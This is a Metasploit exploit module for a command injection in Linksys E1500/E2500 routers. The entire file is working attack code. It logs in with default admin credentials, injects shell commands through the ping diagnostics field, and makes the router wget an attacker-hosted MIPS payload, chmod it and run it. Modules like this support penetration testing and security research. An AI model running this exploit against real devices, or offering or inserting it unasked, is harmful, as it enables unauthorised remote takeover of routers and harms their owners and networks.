## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Linksys E1500/E2500 apply.cgi Remote Command Injection', 'Description' => %q{ Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. }, 'Author' => [ 'Michael Messner ', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-3953' ], [ 'BID', '57760' ], [ 'EDB', '24475' ], [ 'OSVDB', '89912' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ] ], 'DisclosureDate' => '2013-02-05', 'Privileged' => true, 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options( [ OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ] ) end def request(cmd, user, pass, uri) res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'authorization' => basic_auth(user, pass), 'vars_post' => { 'submit_button' => 'Diagnostics', 'change_action' => 'gozila_cgi', 'submit_type' => 'start_ping', 'action' => '', 'commit' => '0', 'ping_ip' => '1.1.1.1', 'ping_size' => "&#{cmd}&", 'ping_times' => '5', 'traceroute_ip' => '' } }) return res rescue ::Rex::ConnectionError vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to connect to the web server") return nil end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(rand(8..15)) uri = '/apply.cgi' user = datastore['HttpUsername'] pass = datastore['HttpPassword'] rhost = datastore['RHOST'] rport = datastore['RPORT'] # # testing Login # print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'authorization' => basic_auth(user, pass) }) if res.nil? or res.code == 404 fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if [200, 301, 302].include?(res.code) print_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login #{user}/#{pass}") else fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end if target.name =~ /CMD/ if !(datastore['CMD']) fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd, user, pass, uri) if (!res) fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{Rex::Socket.to_authority(rhost, rport)} - Blind Exploitation - unknown Exploitation state") end return end # thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else service_url = 'http://' + srvhost_addr + ':' + srvport.to_s + resource_uri print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...") start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => resource_uri }, 'ssl' => false # do not use SSL }) end # # download payload # print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to download #{service_url}") # this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) # not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" res = request(cmd, user, pass, uri) if (!res) fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to chmod #{downfile}") res = request(cmd, user, pass, uri) if (!res) fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # # execute # cmd = "/tmp/#{filename}" print_status("#{Rex::Socket.to_authority(rhost, rport)} - Asking the Linksys device to execute #{downfile}") res = request(cmd, user, pass, uri) if (!res) fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # Handle incoming requests from the server def on_request_uri(cli, _request) # print_status("on_request_uri called: #{request.inspect}") if (!@pl) print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!") return end print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...") waited = 0 until (@elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end end